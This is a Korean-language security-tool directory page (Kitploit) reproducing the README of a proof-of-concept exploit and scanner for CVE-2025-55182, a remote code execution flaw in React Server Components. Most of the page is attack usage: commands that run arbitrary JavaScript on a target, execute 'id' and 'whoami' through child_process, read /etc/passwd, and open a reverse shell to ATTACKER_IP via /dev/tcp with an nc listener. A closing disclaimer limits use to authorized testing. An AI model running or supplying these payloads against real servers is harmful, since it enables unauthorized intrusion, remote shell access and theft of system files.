Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
React2Shell-CVE-2025-55182 — POC React2Shell-CVE-2025-55182 | Kitploit
도구/GitHubGitHub/shadowroot97/react2shell-cve-2025-55182
Vulnerability ScannersExploitationWeb Application ExploitationPenetration TestingRemote Access ToolPayload Development
GitHubshadowroot97/react2shell-cve-2025-55182

React2Shell-CVE-2025-55182

POC React2Shell-CVE-2025-55182

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
8개월 전아직 검토되지 않음

CVE-2025-55182 - React2Shell

root@kitploit:~
    ____  _____    _    ____ _____ ____  ____  _   _ _____ _     _
   |  _ \| ____|  / \  / ___|_   _|___ \/ ___|| | | | ____| |   | |
   | |_) |  _|   / _ \| |     | |   __) \___ \| |_| |  _| |   | |
   |  _ <| |___ / ___ \ |___  | |  / __/ ___) |  _  | |___| |___| |___
   |_| \_\_____/_/   \_\____| |_| |_____|____/|_| |_|_____|_____|_____|
                                                    [ CVE-2025-55182 ]

React Server Components(RSC)용 원격 코드 실행 스캐너

CVE Python


크레딧

역할이름링크
원본 연구Lachlan Davidsongithub.com/lachlan2k

원본 PoC 기반: React2Shell-CVE-2025-55182-original-poc


개요

React2Shell은 React Server Components(RSC) 구현에 영향을 미치는 치명적인 원격 코드 실행(RCE) 취약점인 CVE-2025-55182를 위한 포괄적인 보안 스캐너입니다. 이 취약점은 React Flight 프로토콜의 안전하지 않은 역직렬화를 통해 인증되지 않은 공격자가 서버에서 임의의 JavaScript 코드를 실행할 수 있게 합니다.

주요 기능

  • 다중 변형 테스트: 원본 연구의 4가지 서로 다른 페이로드 구조를 테스트합니다
  • 버전 탐지: 취약한 React 및 프레임워크 버전을 식별합니다
  • RCE 검증: 다이제스트 변형, 타이밍 및 OOB 콜백을 통해 코드 실행을 확인합니다
  • OOB 테스트: Burp Collaborator 및 Interactsh를 지원합니다
  • 사용자 정의 페이로드: 취약한 서버에서 임의의 JavaScript를 실행합니다
  • 데이터 추출: 문자 단위 데이터 유출
  • 전문적 출력: 증거 수집과 함께 깔끔하고 색상이 적용된 터미널 출력

설치

root@kitploit:~
# 저장소 클론
git clone https://github.com/Shadowroot97/POC-React2Shell-CVE-2025-55182.git
cd POC-React2Shell-CVE-2025-55182

# 의존성 설치
pip install requests

# 스캐너 실행
python3 exploit_cve_2025_55182_v2.py -h

사용법

root@kitploit:~
usage: exploit_cve_2025_55182_v2.py [-h] [-t TARGET] [-f FILE] [-m {version,verify,custom}]
                                    [--js JS] [--extract] [--sleep SECONDS]
                                    [--callback URL] [--dns DOMAIN] [-v]
                                    [--no-color] [--timeout TIMEOUT]

스캔 모드

1. 버전 모드 (기본값)

취약한 React 및 프레임워크 버전을 수동적으로 탐지합니다:

root@kitploit:~
python3 exploit_cve_2025_55182_v2.py -t https://target.com

2. 검증 모드 (-m verify)

여러 기법과 4가지 페이로드 변형을 모두 사용하여 RCE를 적극적으로 확인합니다:

root@kitploit:~
# 기본 검증 (다이제스트 변형)
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify

# 시간 기반 검증
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify --sleep 5

# OOB 콜백 사용 (Burp Collaborator)
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify --callback abc123.oastify.com

# 상세 출력을 포함한 전체 검증
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify \
    --sleep 5 --callback abc123.oastify.com --dns abc123.oastify.com -v

3. 사용자 정의 모드 (-m custom)

임의의 JavaScript 페이로드를 실행합니다:

root@kitploit:~
# Node.js 버전 가져오기
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "process.version" --extract

# 시스템 명령 실행
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "require('child_process').execSync('id').toString()" --extract

# 파일 읽기
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "require('fs').readFileSync('/etc/passwd','utf8')" --extract

4. 일괄 스캔 (-f)

파일에서 여러 URL을 스캔하고 취약한 대상만 표시합니다:

root@kitploit:~
python3 exploit_cve_2025_55182_v2.py -f targets.txt

예제

기본 스캔

root@kitploit:~
# 버전 탐지 (기본 모드)
python3 exploit_cve_2025_55182_v2.py -t https://target.com

# RCE 검증
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify

# 여러 대상 일괄 스캔
python3 exploit_cve_2025_55182_v2.py -f targets.txt

# 상세 출력
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify -v

고급 사용법

root@kitploit:~
# 시간 기반 + OOB 검증
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify \
    --sleep 5 --callback your-id.oastify.com

# 서버 정보 추출
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "process.version" --extract

# 명령 실행
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "require('child_process').execSync('whoami').toString()" --extract

리버스 셸

root@kitploit:~
# 리스너 시작
nc -lvnp 443

# 리버스 셸 실행
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1\"')"

면책 조항

이 도구는 승인된 보안 테스트 및 교육 목적으로만 제공됩니다.

  • 소유하거나 테스트에 대한 명시적 허가를 받은 시스템에만 사용하십시오
  • 컴퓨터 시스템에 대한 무단 접근은 불법입니다
  • 저자는 이 도구의 오용에 대해 책임을 지지 않습니다
  • 항상 책임 있는 공개 관행을 따르십시오

참고 자료

  • CVE-2025-55182 - NVD
  • Lachlan Davidson의 원본 PoC
  • React 보안 권고
  • Next.js 보안 권고
  • React Server Components 문서
도구 다운로드
인자설명
-t, --target대상 URL (예: https://example.com)
-f, --file일괄 스캔을 위한 URL 목록이 포함된 파일 (줄당 하나)
-m, --mode스캔 모드: version(기본값), verify 또는 custom
--jscustom 모드용 JavaScript 코드
--extract문자열 결과를 문자 단위로 추출
--sleep SECONDS시간 기반 RCE 검증 (verify 모드)
--callback URLOOB 테스트용 HTTP 콜백 URL (verify 모드)
--dns DOMAINOOB 테스트용 DNS 콜백 도메인 (verify 모드)
-v, --verbose페이로드 상세 정보가 포함된 상세 출력
--no-color색상 출력 비활성화
--timeout SECONDSHTTP 요청 타임아웃 (기본값: 30)